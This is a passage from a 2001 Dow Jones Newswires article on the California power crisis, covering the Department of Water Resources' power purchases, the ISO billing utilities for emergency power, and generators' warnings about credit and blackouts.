requiring suppliers to deliver spare power to California on demand. That order was extended several times, but expired Wednesday. Last week, the California state Legislature moved to secure the state's power supplies by passing a bill authorizing the DWR to enter into contracts to buy power and to finance those purchases by selling billions of dollars in bonds. The idea was to shift power purchases to a buyer with better credit than the utilities. While the bill didn't make the department responsible for covering the state's power needs, the clear message from the governor, the Legislature and the DWR was that the department would secure the power the utilities couldn't buy on their own. That apparent mission might have been altered in the face of the state's own mounting power bills, Maviglio said. The DWR has spent $40 million to $50 million a day buying power and has consumed around $750 million since it took over the job in earnest on Jan. 17. According to testimony at Wednesday's hearing, the DWR has left it to the California ISO to cover the difference between the real-time, or emergency, electricity it finds appropriately priced and what the state needs to buy to keep the lights on. The ISO, in turn, has been billing the state's three investor-owned utilities for power it buys to cover the needs of their customers. "In emergency dispatches, the DWR has not agreed to pay a certain price," said Jim Detmers, and operations officer at the California ISO. "If the DWR does not agree that it will pay a certain price, then it will not procure that power. The ISO will be forced to procure it. Then the ISO will bill the utility wherever the power is needed." The utilities have together defaulted on hundreds of millions of dollars in debt service obligations and power bills, and have said they would already have run out of cash had they paid their bills on time. The volume of power left over by the DWR wasn't known. A spokesman for Southern California Edison said that, to date, the utility is unaware that it's being billed for ongoing power purchases. Pacific Gas & Electric wasn't available for comment. The ISO normally bills for power up to 60 days after it's delivered. The California Electricity Oversight Board, which oversees the operations of the ISO, dismissed the generators' concerns, saying they were threatening to withhold supply to gain leverage to force the DWR to sign long-term contracts at high prices. The ISO, however, indicated that credit concerns remain an issue. "The credit issue is an ongoing problem," Detmers said. "Some generators have indicated they would not supply California, because they are not being paid." Steve Fleishman, an analyst at Merrill Lynch, said California needs to take steps to alleviate those concerns. "In the end, there has to be a creditworthy party and someone who is willing to pay to backstop this situation," Fleishman said. Said Reliant President and Chief Operating Officer Joe Bob Perkins in letter to Gov. Davis Tuesday night, "Unless an immediate change in direction occurs, the California ISO and the Department of Water Resources have set the stage today for a return to credit-driven blackouts in California." The ISO argues that Reliant has contractual obligations to continue supplying power to California. -By Jason Leopold, Dow Jones Newswires; 310-666-9986; mailto:[email protected](Andrew Dowell in New York contributed to this article.) (END) Dow Jones Newswires 08-02-01